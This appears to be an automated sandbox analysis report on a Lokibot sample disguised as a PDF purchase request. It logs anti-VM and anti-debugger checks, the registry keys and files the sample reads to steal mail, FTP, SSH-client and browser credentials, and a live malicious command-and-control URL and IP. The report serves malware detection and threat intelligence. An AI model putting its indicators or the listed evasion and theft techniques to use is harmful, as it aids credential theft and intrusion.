Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane\AsOpenFile.exe

Jump to dropped file

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Code function: 2_2_032D6F6D rdtsc

2_2_032D6F6D

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_00406555 FindFirstFileW,FindClose,	2_2_00406555
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_0040287E FindFirstFileW,	2_2_0040287E
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_00405A03

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	API call chain: ExitProcess graph end node			graph_2-6401
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	API call chain: ExitProcess graph end node			graph_2-6557

Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392074084.0000000001919000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW5
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391638858.00000000018E5000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392074084.0000000001919000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Code function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

2_2_10001B18

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Code function: 2_2_032D6F6D rdtsc

2_2_032D6F6D

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032EF95D mov eax, dword ptr fs:[00000030h]	2_2_032EF95D
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D58A1 mov eax, dword ptr fs:[00000030h]	2_2_032D58A1
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032DA6F5 mov eax, dword ptr fs:[00000030h]	2_2_032DA6F5
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032EDAC1 mov eax, dword ptr fs:[00000030h]	2_2_032EDAC1

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Code function: 2_2_032D9D4A LdrLoadDll,

2_2_032D9D4A

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Process created: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Jump to behavior

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

2_2_0040344A

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match

File source: dump.pcap, type: PCAP

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Remote Access Functionality

Yara detected Lokibot

Source: Yara match

File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 Windows Service	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Windows Service	11 Virtualization/Sandbox Evasion	1 Credentials in Registry	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	11 Process Injection	1 Access Token Manipulation	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	2 Data from Local System	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 DLL Side-Loading	11 Process Injection	NTDS	2 File and Directory Discovery	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	14 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	6 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 DLL Side-Loading	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	18%	ReversingLabs
REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane\AsOpenFile.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll	2%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	0%	Avira URL Cloud	safe
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	0%	Avira URL Cloud	safe
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Avira URL Cloud	safe
http://157.245.36.27/~dokterpol/?page=2874	100%	Avira URL Cloud	malware
http://www.gopher.ftp://ftp.	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Virustotal		Browse
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	0%	Virustotal		Browse
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.185.238	true	false	high
googlehosted.l.googleusercontent.com	142.250.185.161	true	false	high
doc-0g-8k-docs.googleusercontent.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://doc-0g-8k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/65eu063p0f9eoc2qkjfmonuuk5gkqmq4/1669764675000/03238822727237126472/*/1ZppbncXCwboWfcBo0A5zlqzevMjFwzpW?e=download&uuid=c4bc146b-22c6-4e17-89b8-c96a6eb96fab	false		high
http://157.245.36.27/~dokterpol/?page=2874	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://doc-0g-8k-docs.googleusercontent.com/%%doc-0g-8k-docs.googleusercontent.com	REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391896205.0000000001901000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54203683114.00000000005F2000.00000008.00000001.01000000.00000006.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://drive.google.com/	REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391638858.00000000018E5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external	REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54356841847.0000000001984000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392074084.0000000001919000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54203683114.00000000005F2000.00000008.00000001.01000000.00000006.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://doc-0g-8k-docs.googleusercontent.com/)	REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391896205.0000000001901000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	false		high
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD	REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204053166.0000000000626000.00000008.00000001.01000000.00000006.sdmp	false		high
http://www.gopher.ftp://ftp.	REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-0g-8k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/65eu063p	REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54362021539.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54356420593.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392699460.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392074084.0000000001919000.00000004.00000020.00020000.00000000.sdmp	false		high
https://doc-0g-8k-docs.googleusercontent.com/	REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54362021539.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391896205.0000000001901000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392699460.0000000001943000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.161	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
157.245.36.27	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
142.250.185.238	drive.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	756301
Start date and time:	2022-11-30 00:29:09 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/6@2/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 30.1% (good quality ratio 29.4%) Quality average: 88.5% Quality standard deviation: 21.7%
HCA Information:	Successful, ratio: 96% Number of executed functions: 71 Number of non-executed functions: 50
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, ctldl.windowsupdate.com, wdcp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
157.245.36.27	SecuriteInfo.com.Win32.CrypterX-gen.5299.10652.exe	Get hash	malicious	Browse	157.245.36.27/~dokterpol/?page=1806710989428
	SecuriteInfo.com.Win32.CrypterX-gen.16598.12230.exe	Get hash	malicious	Browse	157.245.36.27/~dokterpol/?page=081599145
	DHL Express Shipment DOC..exe	Get hash	malicious	Browse	157.245.36.27/~dokterpol/?page=1806710989428
	SecuriteInfo.com.Win32.PWSX-gen.13189.5701.exe	Get hash	malicious	Browse	157.245.36.27/~dokterpol/?page=2223396
	SecuriteInfo.com.Win32.PWSX-gen.21656.6389.exe	Get hash	malicious	Browse	157.245.36.27/~dokterpol/?page=081599145
	SecuriteInfo.com.Win32.PWSX-gen.14230.29034.exe	Get hash	malicious	Browse	157.245.36.27/~dokterpol/?page=14914169539334
	770178655752.exe	Get hash	malicious	Browse	157.245.36.27/~dokterpol/?page=447989547
	DHL Invoice 1224811733.exe	Get hash	malicious	Browse	157.245.36.27/~dokterpol/?page=1806710989428
	Purchase Inquiry.exe	Get hash	malicious	Browse	157.245.36.27/~dokterpol/?page=14914169539334
	77017865573.exe	Get hash	malicious	Browse	157.245.36.27/~dokterpol/?page=447989547
